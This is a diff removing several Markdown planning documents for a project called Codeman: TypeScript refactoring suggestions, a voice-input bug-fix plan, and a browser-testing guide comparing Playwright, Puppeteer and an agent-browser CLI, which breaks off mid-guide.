- Tokens Used: peak / current
|
||||
- Active Time: formatted duration
|
||||
- Issues: errors + warnings count
|
||||
- Timeline:
|
||||
- Vertical timeline of events
|
||||
- Color-coded by severity (green=success, blue=info, yellow=warning, red=error)
|
||||
- Expandable details
|
||||
- Filter by event type
|
||||
- Footer: "Close" button
|
||||
|
||||
## Implementation Steps
|
||||
|
||||
1. Add types to `types.ts`
|
||||
2. Create `run-summary.ts` with RunSummaryTracker class
|
||||
3. Integrate tracker with server.ts (create per session, wire events)
|
||||
4. Add API endpoint
|
||||
5. Add frontend modal and button
|
||||
6. Test with live session
|
||||
|
||||
## Storage
|
||||
|
||||
Run summaries are kept in memory only (not persisted to disk) since:
|
||||
- They're session-specific and regenerated on session start
|
||||
- Persisting thousands of events would bloat state.json
|
||||
- Server restart = fresh session anyway
|
||||
|
||||
If persistence is needed later, could add to `state-inner.json` with per-session limits.
|
||||
@@ -1,387 +0,0 @@
|
||||
# Codeman TypeScript Improvement Suggestions
|
||||
|
||||
**Generated**: February 2026
|
||||
**Based on**: Research into TypeScript best practices (2024-2025) and codebase analysis
|
||||
|
||||
---
|
||||
|
||||
## 🔴 High Priority (Low effort, high impact)
|
||||
|
||||
### 1. Use the Already-Installed Zod for API Validation
|
||||
|
||||
Zod v4.3.6 is in `package.json` but **never imported**. API routes use unsafe type assertions:
|
||||
|
||||
```typescript
|
||||
// Current (unsafe)
|
||||
const body = req.body as CreateSessionRequest;
|
||||
|
||||
// Recommended
|
||||
const result = CreateSessionSchema.safeParse(req.body);
|
||||
if (!result.success) return createErrorResponse(ApiErrorCode.INVALID_INPUT, ...);
|
||||
```
|
||||
|
||||
**Impact**: Prevents runtime errors from malformed client requests.
|
||||
|
||||
**Files to update**: `src/web/server.ts` (all POST/PUT routes)
|
||||
|
||||
---
|
||||
|
||||
### 2. Add `assertNever` for Exhaustive Switch Checking
|
||||
|
||||
Switch statements on union types (e.g., `respawn-controller.ts:1072`, `ralph-tracker.ts:2088`) lack exhaustive checking. Adding new union members won't cause compile errors.
|
||||
|
||||
```typescript
|
||||
// Add to src/utils/type-safety.ts
|
||||
export function assertNever(x: never, message?: string): never {
|
||||
throw new Error(message ?? `Unexpected value: ${JSON.stringify(x)}`);
|
||||
}
|
||||
|
||||
// Usage in switch statements
|
||||
switch (status) {
|
||||
case 'idle': return handleIdle();
|
||||
case 'busy': return handleBusy();
|
||||
case 'stopped': return handleStopped();
|
||||
case 'error': return handleError();
|
||||
default: return assertNever(status);
|
||||
}
|
||||
```
|
||||
|
||||
**Impact**: Compile-time guarantee all cases are handled.
|
||||
|
||||
**Files affected**: `respawn-controller.ts`, `ralph-tracker.ts`, any file with switch on union types
|
||||
|
||||
---
|
||||
|
||||
### 3. Standardize `createErrorResponse` Usage
|
||||
|
||||
Currently only used in 2 files despite being a good pattern. Many routes still use ad-hoc error responses.
|
||||
|
||||
**Impact**: Consistent API error format across all endpoints.
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority (Medium effort, significant benefit)
|
||||
|
||||
### 4. Convert `ApiResponse<T>` to Discriminated Union
|
||||
|
||||
Current interface has optional properties; discriminated union enables better narrowing:
|
||||
|
||||
```typescript
|
||||
// Current (types.ts)
|
||||
interface ApiResponse<T> { success: boolean; error?: string; data?: T; }
|
||||
|
||||
// Better
|
||||
type ApiResponse<T> =
|
||||
| { success: true; data: T }
|
||||
| { success: false; error: string; errorCode: ApiErrorCode };
|
||||
|
||||
// Usage with exhaustive checking
|
||||
function handleResponse<T>(response: ApiResponse<T>): T {
|
||||
if (response.success) {
|
||||
return response.data; // TypeScript knows data exists
|
||||
} else {
|
||||
throw new Error(response.error); // TypeScript knows error exists
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### 5. Add Branded Types for Token Counts
|
||||
|
||||
Prevents mixing input/output tokens in calculations:
|
||||
|
||||
```typescript
|
||||
// src/types/branded.ts
|
||||
type Brand<K, T extends string> = K & { readonly __brand: T };
|
||||
|
||||
export type InputTokens = Brand<number, 'InputTokens'>;
|
||||
export type OutputTokens = Brand<number, 'OutputTokens'>;
|
||||
export type TokenCount = Brand<number, 'TokenCount'>;
|
||||
export type Milliseconds = Brand<number, 'Milliseconds'>;
|
||||
|
||||
// Constructor functions
|
||||
export function inputTokens(value: number): InputTokens {
|
||||
if (value < 0) throw new Error('Token count cannot be negative');
|
||||
return value as InputTokens;
|
||||
}
|
||||
```
|
||||
|
||||
**Use cases**:
|
||||
- Token counts (`_totalInputTokens`, `_totalOutputTokens`)
|
||||
- Timeout values (`idleTimeoutMs`, `completionConfirmMs`, `noOutputTimeoutMs`)
|
||||
- IDs (`SessionId`, `TaskId`, `CycleId`)
|
||||
|
||||
---
|
||||
|
||||
### 6. Dependency Injection for Core Services
|
||||
|
||||
Replace hidden singleton dependencies with constructor injection for better testability:
|
||||
|
||||
```typescript
|
||||
// Current: Hidden dependencies
|
||||
export class RalphLoop extends EventEmitter {
|
||||
constructor() {
|
||||
this.sessionManager = getSessionManager();
|
||||
this.store = getStore();
|
||||
}
|
||||
}
|
||||
|
||||
// Better: Explicit dependencies
|
||||
export interface RalphLoopDeps {
|
||||
sessionManager: SessionManager;
|
||||
taskQueue: TaskQueue;
|
||||
store: StateStore;
|
||||
}
|
||||
|
||||
export class RalphLoop extends EventEmitter {
|
||||
constructor(deps: RalphLoopDeps, options?: RalphLoopOptions) {
|
||||
this.sessionManager = deps.sessionManager;
|
||||
// ...
|
||||
}
|
||||
}
|
||||
|
||||
// Production factory
|
||||
export function createRalphLoop(options?: RalphLoopOptions): RalphLoop {
|
||||
return new RalphLoop({
|
||||
sessionManager: getSessionManager(),
|
||||
taskQueue: getTaskQueue(),
|
||||
store: getStore(),
|
||||
}, options);
|
||||
}
|
||||
```
|
||||
|
||||
**Start with**: `RalphLoop` (has the most dependencies)
|
||||
|
||||
**Benefits**: Easier testing, explicit dependencies, SOLID compliance
|
||||
|
||||
---
|
||||
|
||||
### 7. Enforce Consistent `import type` Usage
|
||||
|
||||
Mixed usage across codebase. Add ESLint rule:
|
||||
|
||||
```json
|
||||
{
|
||||
"rules": {
|
||||
"@typescript-eslint/consistent-type-imports": ["error", {
|
||||
"prefer": "type-imports",
|
||||
"fixStyle": "separate-type-imports"
|
||||
}]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Benefits**: Reduced bundle size, better tree-shaking, cleaner separation
|
||||
|
||||
---
|
||||
|
||||
### 8. Add Circular Dependency Detection
|
||||
|
||||
```bash
|
||||
npm install -D dpdm
|
||||
```
|
||||
|
||||
Add to `package.json`:
|
||||
```json
|
||||
{
|
||||
"scripts": {
|
||||
"check:circular": "dpdm --no-warning --no-tree src/index.ts"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Potential risk areas identified**:
|
||||
- `ralph-loop.ts` → `session-manager.ts` → `session.ts`
|
||||
- `respawn-controller.ts` → `session.ts` → `ai-idle-checker.ts`
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Lower Priority (Higher effort, situational benefit)
|
||||
|
||||
### 9. Apply `as const satisfies` to Default Configs
|
||||
|
||||
Preserves literal types while validating structure:
|
||||
|
||||
```typescript
|
||||
// Current
|
||||
export const DEFAULT_NICE_CONFIG: NiceConfig = {
|
||||
enabled: false,
|
||||
niceValue: 10,
|
||||
};
|
||||
// niceValue is type: number
|
||||
|
||||
// Better
|
||||
export const DEFAULT_NICE_CONFIG = {
|
||||
enabled: false,
|
||||
niceValue: 10,
|
||||
} as const satisfies NiceConfig;
|
||||
// niceValue is type: 10 (literal)
|
||||
```
|
||||
|
||||
**Files**: `types.ts`, `respawn-controller.ts` (DEFAULT_CONFIG)
|
||||
|
||||
---
|
||||
|
||||
### 10. Create Custom Error Class Hierarchy
|
||||
|
||||
Replace string-based errors with typed errors:
|
||||
|
||||
```typescript
|
||||
// src/errors.ts
|
||||
export class CodemanError extends Error {
|
||||
constructor(
|
||||
message: string,
|
||||
public code: string,
|
||||
public context?: Record<string, unknown>
|
||||
) {
|
||||
super(message);
|
||||
Object.setPrototypeOf(this, CodemanError.prototype);
|
||||
this.name = 'CodemanError';
|
||||
}
|
||||
}
|
||||
|
||||
export class SessionError extends CodemanError {
|
||||
constructor(message: string, code: string, public sessionId: string) {
|
||||
super(message, code, { sessionId });
|
||||
this.name = 'SessionError';
|
||||
}
|
||||
}
|
||||
|
||||
export class ValidationError extends CodemanError {
|
||||
constructor(message: string, public field: string, public value: unknown) {
|
||||
super(message, 'VALIDATION_ERROR', { field, value });
|
||||
this.name = 'ValidationError';
|
||||
}
|
||||
}
|
||||
|
||||
export class ScreenError extends CodemanError {
|
||||
constructor(message: string, public screenName: string, public operation: string) {
|
||||
super(message, 'SCREEN_ERROR', { screenName, operation });
|
||||
this.name = 'ScreenError';
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### 11. Split Large Files
|
||||
|
||||
**`types.ts` (~1500 lines)**:
|
||||
```
|
||||
src/types/
|
||||
index.ts # Re-exports all
|
||||
session.types.ts # Session-related types
|
||||
task.types.ts # Task-related types
|
||||
ralph.types.ts # Ralph loop types
|
||||
api.types.ts # API request/response types
|
||||
config.types.ts # Configuration types
|
||||
factories.ts # createInitialState(), etc.
|
||||
```
|
||||
|
||||
**`server.ts`**:
|
||||
```
|
||||
src/web/
|
||||
server.ts # Main Fastify setup
|
||||
routes/
|
||||
sessions.ts # Session management routes
|
||||
respawn.ts # Respawn control routes
|
||||
scheduled.ts # Scheduled run routes
|
||||
system.ts # System status routes
|
||||
sse/
|
||||
manager.ts # SSE client management
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### 12. Formalize Result Pattern
|
||||
|
||||
Existing `validateTokenCounts` returns `{ isValid, reason }` which is essentially a Result.
|
||||
|
||||
**Option A: Simple Result type (no dependency)**:
|
||||
```typescript
|
||||
// src/utils/result.ts
|
||||
export type Result<T, E = Error> =
|
||||
| { success: true; data: T }
|
||||
| { success: false; error: E };
|
||||
|
||||
export const ok = <T>(data: T): Result<T, never> => ({ success: true, data });
|
||||
export const err = <E>(error: E): Result<never, E> => ({ success: false, error });
|
||||
```
|
||||
|
||||
**Option B: Install neverthrow**:
|
||||
```bash
|
||||
npm install neverthrow
|
||||
```
|
||||
|
||||
Provides chaining (`map`, `andThen`, `match`) and `ResultAsync` for async operations.
|
||||
|
||||
---
|
||||
|
||||
### 13. Template Literal Types for IDs
|
||||
|
||||
Enforce ID formats at compile time:
|
||||
|
||||
```typescript
|
||||
type CycleIdFormat = `${string}:cycle-${number}`;
|
||||
type ScreenSessionName = `codeman-${string}`;
|
||||
|
||||
interface RespawnCycleMetrics {
|
||||
cycleId: CycleIdFormat; // Enforces format at compile time
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Summary Table
|
||||
|
||||
| # | Suggestion | Category | Effort | Impact |
|
||||
|---|------------|----------|--------|--------|
|
||||
| 1 | Use Zod for API validation | Error Handling | Low | High |
|
||||
| 2 | Add `assertNever` utility | Type Safety | Low | High |
|
||||
| 3 | Standardize `createErrorResponse` | Error Handling | Low | Medium |
|
||||
| 4 | Discriminated union for `ApiResponse` | Type Safety | Medium | High |
|
||||
| 5 | Branded types for tokens | Type Safety | Medium | Medium |
|
||||
| 6 | Dependency injection for services | Architecture | Medium | High |
|
||||
| 7 | Enforce `import type` | Architecture | Low | Medium |
|
||||
| 8 | Circular dependency detection | Architecture | Low | Medium |
|
||||
| 9 | `as const satisfies` for configs | Type Safety | Low | Low |
|
||||
| 10 | Custom error classes | Error Handling | Medium | Medium |
|
||||
| 11 | Split large files | Architecture | High | Medium |
|
||||
| 12 | Formalize Result pattern | Error Handling | Medium | Medium |
|
||||
| 13 | Template literal types for IDs | Type Safety | Low | Low |
|
||||
|
||||
---
|
||||
|
||||
## Notable Strengths to Keep
|
||||
|
||||
These patterns are already well-implemented and should be preserved:
|
||||
|
||||
- **Circuit breaker pattern** in `state-store.ts` and `ai-checker-base.ts` (excellent resilience)
|
||||
- **`getErrorMessage()` utility** (solid, used in 8 files)
|
||||
- **Barrel files for `utils/` and `prompts/`** (appropriate size, good organization)
|
||||
- **Strict TypeScript config** (comprehensive strictness settings)
|
||||
- **Well-documented configuration** in `src/config/`
|
||||
- **Extensive union types** for status tracking (18+ well-defined types)
|
||||
- **Type guards** like `isError()` for runtime narrowing
|
||||
|
||||
---
|
||||
|
||||
## References
|
||||
|
||||
### Type Safety
|
||||
- [TypeScript Handbook: Narrowing](https://www.typescriptlang.org/docs/handbook/2/narrowing.html)
|
||||
- [Fullstory: Discriminated Unions](https://www.fullstory.com/blog/discriminated-unions-and-exhaustiveness-checking-in-typescript/)
|
||||
- [Learning TypeScript: Branded Types](https://www.learningtypescript.com/articles/branded-types)
|
||||
- [Total TypeScript: satisfies Operator](https://www.totaltypescript.com/how-to-use-satisfies-operator)
|
||||
|
||||
### Error Handling
|
||||
- [neverthrow GitHub](https://github.com/supermacro/neverthrow)
|
||||
- [Zod Documentation](https://zod.dev/)
|
||||
- [Custom Errors in TypeScript](https://medium.com/@Nelsonalfonso/understanding-custom-errors-in-typescript-a-complete-guide-f47a1df9354c)
|
||||
|
||||
### Architecture
|
||||
- [Please Stop Using Barrel Files - TkDodo](https://tkdodo.eu/blog/please-stop-using-barrel-files)
|
||||
- [TypeScript Dependency Injection](https://softwarepatternslexicon.com/js/typescript-and-javascript-design-patterns/dependency-injection-with-typescript/)
|
||||
- [dpdm - Circular Dependency Detector](https://github.com/acrazing/dpdm)
|
||||
- [Consistent Type Imports - typescript-eslint](https://typescript-eslint.io/blog/consistent-type-imports-and-exports-why-and-how/)
|
||||
@@ -1,155 +0,0 @@
|
||||
# Voice Input V2 — Implementation Plan
|
||||
|
||||
## Executive Summary
|
||||
|
||||
Fix and improve the existing VoiceInput implementation. The core class is solid but has **critical integration bugs** that prevent it from working on mobile, plus several UX improvements needed to make it feel fast and polished.
|
||||
|
||||
---
|
||||
|
||||
## Current State: What Exists
|
||||
|
||||
The `VoiceInput` singleton (app.js:602-830) is already committed and uses the Web Speech API with:
|
||||
- Toggle mode (tap start/stop), 5s silence auto-stop
|
||||
- `interimResults: true` for streaming transcription preview
|
||||
- iOS Safari `isFinal` workaround (750ms stability timer)
|
||||
- Desktop button in `toolbar-right`, mobile button in `KeyboardAccessoryBar`
|
||||
- `voice-pulse` CSS animation, `.voice-preview` overlay
|
||||
- Cleanup on SSE reconnect, haptic feedback on mobile
|
||||
|
||||
## Critical Bugs Found (Must Fix)
|
||||
|
||||
### Bug 1: Mobile button NEVER shows (CRITICAL)
|
||||
`KeyboardAccessoryBar.init()` runs at line 2239, BEFORE `VoiceInput.init()` at line 2240. The accessory bar template checks `VoiceInput.supported` at render time — but `init()` hasn't run yet, so `supported` is still `false`. The inline `style="${VoiceInput.supported ? '' : 'display:none'}"` always resolves to `display:none`.
|
||||
|
||||
**Fix:** Move `VoiceInput.init()` BEFORE `KeyboardAccessoryBar.init()`, OR remove the inline style check and have `VoiceInput.init()` show/hide the mobile button after the fact (like it does for desktop).
|
||||
|
||||
### Bug 2: `_showButtons()` ignores mobile button
|
||||
`_showButtons()` only targets `#voiceInputBtn` (desktop). It never removes `display:none` from the mobile `[data-action="voice"]` button.
|
||||
|
||||
**Fix:** Add mobile button selector to `_showButtons()`.
|
||||
|
||||
### Bug 3: Recognition instance leak on cleanup
|
||||
`cleanup()` stops recording and removes the preview element, but doesn't null out `this.recognition`. After `cleanup()` + `init()` on SSE reconnect, the old `SpeechRecognition` instance with its handlers is orphaned.
|
||||
|
||||
**Fix:** Add `this.recognition = null` in `cleanup()`.
|
||||
|
||||
## UX Improvements (Should Fix)
|
||||
|
||||
### Improvement 1: Consider auto-sending after voice
|
||||
Currently, voice text is inserted but the user must press Enter. This is safe but adds friction. Two options:
|
||||
- **Option A (safe, current):** Insert text, user presses Enter — good for a terminal where wrong commands matter
|
||||
- **Option B (fast):** Insert text + auto-send `\r` after a brief 500ms delay — feels more "voice assistant"-like
|
||||
- **Recommendation:** Keep Option A as default, but add an optional setting for auto-send
|
||||
|
||||
### Improvement 2: Shorter silence timeout for commands
|
||||
5 seconds of silence before auto-stop feels slow for short terminal commands. Consider:
|
||||
- 3 seconds for auto-stop (still generous for natural pauses)
|
||||
- Or make it configurable via settings
|
||||
|
||||
### Improvement 3: Better visual state on mobile
|
||||
The blue-tinted voice button in the accessory bar is distinctive but subtle. When recording:
|
||||
- The `.recording` class turns it red with pulse — good
|
||||
- But the button is small among other buttons — easy to miss the state change
|
||||
- Consider: also show a small red dot indicator in the header or terminal area during recording
|
||||
|
||||
## Architecture Decision: Keep Web Speech API
|
||||
|
||||
Confirmed by research: Web Speech API is the right choice.
|
||||
- **Free, fast (150-300ms interim), trivial complexity**
|
||||
- Chrome + Safari = ~70% of users, ~95% of Codeman's target audience (devs on Chrome)
|
||||
- Works on localhost without HTTPS
|
||||
- Accuracy is adequate for English command dictation
|
||||
- Deepgram streaming (Phase 2 optional) only if accuracy complaints arise
|
||||
- Skip Whisper batch entirely (too slow for interactive voice input)
|
||||
|
||||
## Implementation Plan
|
||||
|
||||
### Phase 1: Fix Critical Bugs (Priority)
|
||||
|
||||
**File: `src/web/public/app.js`**
|
||||
|
||||
1. **Fix init order** — Move `VoiceInput.init()` BEFORE `KeyboardAccessoryBar.init()`:
|
||||
```
|
||||
// Current (broken):
|
||||
KeyboardAccessoryBar.init();
|
||||
VoiceInput.init();
|
||||
|
||||
// Fixed:
|
||||
VoiceInput.init();
|
||||
KeyboardAccessoryBar.init();
|
||||
```
|
||||
|
||||
2. **Fix `_showButtons()` to handle mobile** — Add mobile button selector:
|
||||
```javascript
|
||||
_showButtons() {
|
||||
const desktopBtn = document.getElementById('voiceInputBtn');
|
||||
if (desktopBtn) desktopBtn.style.display = '';
|
||||
// Also show mobile button (may not exist yet if KeyboardAccessoryBar hasn't init'd)
|
||||
const mobileBtn = document.querySelector('[data-action="voice"]');
|
||||
if (mobileBtn) mobileBtn.style.display = '';
|
||||
}
|
||||
```
|
||||
|
||||
3. **Fix cleanup leak** — Null out recognition instance:
|
||||
```javascript
|
||||
cleanup() {
|
||||
if (this.isRecording) this.stop();
|
||||
if (this.previewEl) {
|
||||
this.previewEl.remove();
|
||||
this.previewEl = null;
|
||||
}
|
||||
this.recognition = null; // <-- add this
|
||||
clearTimeout(this.silenceTimeout);
|
||||
clearTimeout(this._stabilityTimer);
|
||||
// ... rest
|
||||
}
|
||||
```
|
||||
|
||||
4. **Remove inline style from mobile button template** — Since `_showButtons()` will handle visibility, the template should always render the button visible and let `init()` hide it if unsupported:
|
||||
```
|
||||
// Current (broken):
|
||||
style="${VoiceInput.supported ? '' : 'display:none'}"
|
||||
|
||||
// Fixed: remove the style attr entirely, let _showButtons/_hideButtons manage it
|
||||
```
|
||||
Actually better: **always show the button** if we init VoiceInput before KeyboardAccessoryBar. The `VoiceInput.supported` will be set correctly by then.
|
||||
|
||||
### Phase 2: UX Polish
|
||||
|
||||
5. **Reduce silence timeout** from 5s to 3s for snappier feel
|
||||
|
||||
6. **Add recording indicator** — When recording, add a subtle pulsing red dot to the session header or status area so the recording state is visible even if the button is off-screen
|
||||
|
||||
7. **Voice input setting** — Add a toggle in App Settings to enable/disable voice input (some users may not want the button). Default: enabled on supported browsers.
|
||||
|
||||
### Phase 3: Future Enhancements (Not in this PR)
|
||||
|
||||
- Language selector (currently hardcoded `en-US`)
|
||||
- Auto-send option (insert text + `\r` automatically)
|
||||
- Deepgram WebSocket fallback for Firefox/Edge
|
||||
- Waveform visualization during recording
|
||||
- Voice command recognition ("clear", "compact", "new session")
|
||||
|
||||
## Files to Modify
|
||||
|
||||
| File | Changes |
|
||||
|------|---------|
|
||||
| `src/web/public/app.js` | Fix init order, fix `_showButtons()`, fix `cleanup()`, remove inline style, reduce silence timeout |
|
||||
| `src/web/public/mobile.css` | (optional) Adjust voice preview positioning if needed |
|
||||
|
||||
## Testing Plan
|
||||
|
||||
1. **Desktop Chrome:** Verify mic button visible in toolbar-right, click toggles recording state, interim text shows in preview, final text inserted at prompt
|
||||
2. **Mobile Chrome (emulated):** Verify mic button visible in accessory bar, tap toggles recording, pulse animation plays
|
||||
3. **Firefox:** Verify mic button is hidden (no SpeechRecognition support)
|
||||
4. **SSE reconnect:** Verify cleanup stops recording and re-init works
|
||||
5. **No active session:** Verify toast "No active session" shows when tapping mic with no session
|
||||
|
||||
## Risk Assessment
|
||||
|
||||
| Risk | Impact | Mitigation |
|
||||
|------|--------|------------|
|
||||
| iOS Safari isFinal bug | Medium | Already handled by 750ms stability timer |
|
||||
| Chrome auto-stops after 60s | Low | Prompts are short; 3s silence timeout covers this |
|
||||
| Mic permission denied | Low | Error toast with clear message |
|
||||
| Init order regression | High | Integration test to verify button visibility |
|
||||
@@ -1,338 +0,0 @@
|
||||
# Browser Testing Guide for Codeman
|
||||
|
||||
This guide documents the browser testing infrastructure, framework comparison results, and best practices for testing the Codeman web UI.
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Run standalone benchmark (recommended - avoids vitest hook issues)
|
||||
npx tsx scripts/browser-comparison.mjs
|
||||
|
||||
# Run existing browser E2E tests
|
||||
npm test -- test/browser-e2e.test.ts
|
||||
```
|
||||
|
||||
## Framework Comparison Results
|
||||
|
||||
We tested three browser automation frameworks against the Codeman web UI:
|
||||
|
||||
| Framework | Avg Duration | Best For |
|
||||
|-----------|--------------|----------|
|
||||
| **Puppeteer** | 1223ms | Simple operations, Chrome-specific features |
|
||||
| **Playwright** | 1373ms | Complex interactions, cross-browser, debugging |
|
||||
| **Agent-Browser** | N/A (timeout) | AI agent navigation with semantic locators |
|
||||
|
||||
### Detailed Benchmarks
|
||||
|
||||
| Scenario | Playwright | Puppeteer |
|
||||
|----------|------------|-----------|
|
||||
| Page load | 1445ms | 433ms |
|
||||
| Element selection | 442ms | 373ms |
|
||||
| Modal interaction | 1487ms | 1605ms |
|
||||
| Rapid operations (5 cycles) | 2119ms | 2482ms |
|
||||
|
||||
**Key findings:**
|
||||
- Puppeteer is faster for simple page loads and element selection
|
||||
- Playwright handles rapid/complex interactions better (auto-waiting)
|
||||
- Agent-browser CLI has startup overhead issues in this environment
|
||||
|
||||
## Known Issues
|
||||
|
||||
### Vitest Hook Timeouts
|
||||
|
||||
**Problem:** Browser tests using vitest's `beforeAll`/`afterAll` hooks consistently timeout, even when the tests actually complete successfully.
|
||||
|
||||
**Symptoms:**
|
||||
- Tests show as "skipped"
|
||||
- Error: "Hook timed out in 60000ms"
|
||||
- But cleanup messages appear (indicating tests ran)
|
||||
|
||||
**Root cause:** Unclear - possibly related to:
|
||||
- vitest's module isolation with async browser launches
|
||||
- Interaction between global setup.ts hooks and test-level hooks
|
||||
- Multiple test file imports causing duplicate hook execution
|
||||
|
||||
**Workarounds:**
|
||||
1. **Use standalone scripts** (recommended):
|
||||
```bash
|
||||
npx tsx scripts/browser-comparison.mjs
|
||||
```
|
||||
|
||||
2. **Run browser code directly in tests** (not in hooks):
|
||||
```typescript
|
||||
it('should test something', async () => {
|
||||
const browser = await chromium.launch();
|
||||
// ... test code ...
|
||||
await browser.close();
|
||||
});
|
||||
```
|
||||
|
||||
3. **Use the existing browser-e2e.test.ts pattern** which uses agent-browser CLI commands via `execSync` (avoids async hook issues)
|
||||
|
||||
## Test File Structure
|
||||
|
||||
### Port Allocation
|
||||
|
||||
| Port Range | Test File |
|
||||
|------------|-----------|
|
||||
| 3150-3153 | browser-e2e.test.ts (existing) |
|
||||
| 3154 | file-link-click.test.ts |
|
||||
| 3155 | browser-playwright.test.ts |
|
||||
| 3156 | browser-puppeteer.test.ts |
|
||||
| 3157 | browser-agent.test.ts |
|
||||
| 3158-3160 | browser-comparison.test.ts |
|
||||
| 3180-3182 | scripts/browser-comparison.mjs |
|
||||
|
||||
### File Purposes
|
||||
|
||||
| File | Framework | Status |
|
||||
|------|-----------|--------|
|
||||
| `test/browser-e2e.test.ts` | agent-browser | ✅ Working |
|
||||
| `test/browser-playwright.test.ts` | Playwright | ⚠️ Vitest hook issues |
|
||||
| `test/browser-puppeteer.test.ts` | Puppeteer | ⚠️ Vitest hook issues |
|
||||
| `test/browser-agent.test.ts` | agent-browser | ⚠️ Vitest hook issues |
|
||||
| `scripts/browser-comparison.mjs` | All three | ✅ Working (standalone) |
|
||||
|
||||
## Framework-Specific Patterns
|
||||
|
||||
### Playwright
|
||||
|
||||
```typescript
|
||||
import { chromium } from 'playwright';
|
||||
|
||||
const browser = await chromium.launch({
|
||||
headless: true,
|
||||
args: ['--no-sandbox', '--disable-setuid-sandbox', '--disable-dev-shm-usage'],
|
||||
});
|
||||
|
||||
const page = await browser.newPage();
|
||||
await page.goto('http://localhost:3000');
|
||||
|
||||
// Auto-waiting selectors
|
||||
await page.click('.btn-claude');
|
||||
await page.waitForSelector('.session-tab', { state: 'visible' });
|
||||
|
||||
// Assertions with expect
|
||||
await expect(page.locator('.header')).toBeVisible();
|
||||
await expect(page).toHaveTitle('Codeman');
|
||||
|
||||
await browser.close();
|
||||
```
|
||||
|
||||
**Pros:**
|
||||
- Built-in auto-waiting
|
||||
- Excellent trace viewer for debugging
|
||||
- Cross-browser support (Chromium, Firefox, WebKit)
|
||||
- Native `expect` assertions
|
||||
|
||||
**Cons:**
|
||||
- Slightly slower page loads
|
||||
- Larger dependency
|
||||
|
||||
### Puppeteer
|
||||
|
||||
```typescript
|
||||
import puppeteer from 'puppeteer';
|
||||
|
||||
const browser = await puppeteer.launch({
|
||||
headless: true,
|
||||
args: ['--no-sandbox', '--disable-setuid-sandbox', '--disable-dev-shm-usage'],
|
||||
});
|
||||
|
||||
const page = await browser.newPage();
|
||||
await page.goto('http://localhost:3000');
|
||||
|
||||
// Manual waiting often needed
|
||||
await page.click('.btn-claude');
|
||||
await page.waitForSelector('.session-tab', { visible: true });
|
||||
|
||||
// Element queries
|
||||
const title = await page.title();
|
||||
const text = await page.$eval('.logo', el => el.textContent);
|
||||
|
||||
// CDP access for advanced features
|
||||
const client = await page.target().createCDPSession();
|
||||
await client.send('Performance.enable');
|
||||
|
||||
await browser.close();
|
||||
```
|
||||
|
||||
**Pros:**
|
||||
- Faster for simple operations
|
||||
- Direct Chrome DevTools Protocol access
|
||||
- Smaller dependency
|
||||
- Good for Chrome-specific testing
|
||||
|
||||
**Cons:**
|
||||
- Chrome/Chromium only
|
||||
- Manual waiting required
|
||||
- Less robust for complex interactions
|
||||
|
||||
### Agent-Browser (CLI)
|
||||
|
||||
```typescript
|
||||
import { execSync } from 'node:child_process';
|
||||
|
||||
function agentBrowser(cmd: string): string {
|
||||
return execSync(`npx agent-browser ${cmd}`, {
|
||||
timeout: 30000,
|
||||
encoding: 'utf-8',
|
||||
}).trim();
|
||||
}
|
||||
|
||||
function agentBrowserJson<T>(cmd: string): T {
|
||||
const result = agentBrowser(`${cmd} --json`);
|
||||
return JSON.parse(result).data;
|
||||
}
|
||||
|
||||
// Usage
|
||||
agentBrowser('open http://localhost:3000');
|
||||
agentBrowser('click ".btn-claude"');
|
||||
const title = agentBrowserJson<{title: string}>('get title');
|
||||
|
||||
// Semantic locators (AI-friendly)
|
||||
agentBrowser('find role button click --name "Submit"');
|
||||
agentBrowser('find text "Settings" click');
|
||||
|
||||
// Accessibility snapshot
|
||||
const snapshot = agentBrowser('snapshot');
|
||||
|
||||
agentBrowser('close');
|
||||
```
|
||||
|
||||
**Pros:**
|
||||
- AI-agent friendly (semantic locators)
|
||||
- Accessibility tree snapshots
|
||||
- Simple CLI interface
|
||||
- Reference-based selection (@e1, @e2)
|
||||
|
||||
**Cons:**
|
||||
- CLI overhead (spawn process per command)
|
||||
- Slower for rapid operations
|
||||
- Less programmatic control
|
||||
|
||||
## Best Practices
|
||||
|
||||
### 1. Use Standalone Scripts for Benchmarks
|
||||
|
||||
Vitest has issues with browser hooks. For reliable benchmarking:
|
||||
|
||||
```bash
|
||||
# Create a standalone .mjs script
|
||||
npx tsx scripts/browser-comparison.mjs
|
||||
```
|
||||
|
||||
### 2. Browser Launch Arguments
|
||||
|
||||
Always include these args for headless environments:
|
||||
|
||||
```typescript
|
||||
{
|
||||
headless: true,
|
||||
args: [
|
||||
'--no-sandbox', // Required for Docker/CI
|
||||
'--disable-setuid-sandbox',
|
||||
'--disable-dev-shm-usage', // Prevents /dev/shm issues
|
||||
],
|
||||
}
|
||||
```
|
||||
|
||||
### 3. Install Playwright Browsers
|
||||
|
||||
```bash
|
||||
npx playwright install chromium
|
||||
```
|
||||
|
||||
### 4. Wait for Server Startup
|
||||
|
||||
```typescript
|
||||
const server = new WebServer(PORT);
|
||||
await server.start();
|
||||
await new Promise(r => setTimeout(r, 1000)); // Allow server to stabilize
|
||||
```
|
||||
|
||||
### 5. Clean Up Sessions
|
||||
|
||||
Track created sessions for cleanup:
|
||||
|
||||
```typescript
|
||||
const createdSessions: string[] = [];
|
||||
|
||||
// In test
|
||||
const response = await fetch(`${BASE_URL}/api/sessions`);
|
||||
const data = await response.json();
|
||||
createdSessions.push(data.sessions[0].id);
|
||||
|
||||
// In cleanup
|
||||
for (const id of createdSessions) {
|
||||
await fetch(`${BASE_URL}/api/sessions/${id}`, { method: 'DELETE' });
|
||||
}
|
||||
```
|
||||
|
||||
### 6. Handle Modal Timing
|
||||
|
||||
Modals have animation delays:
|
||||
|
||||
```typescript
|
||||
// Playwright (auto-waits)
|
||||
await page.click('.help-btn');
|
||||
await page.waitForSelector('#helpModal', { state: 'visible' });
|
||||
|
||||
// Puppeteer (manual wait)
|
||||
await page.click('.help-btn');
|
||||
await page.waitForSelector('#helpModal', { visible: true });
|
||||
|
||||
// Agent-browser (explicit delay)
|
||||
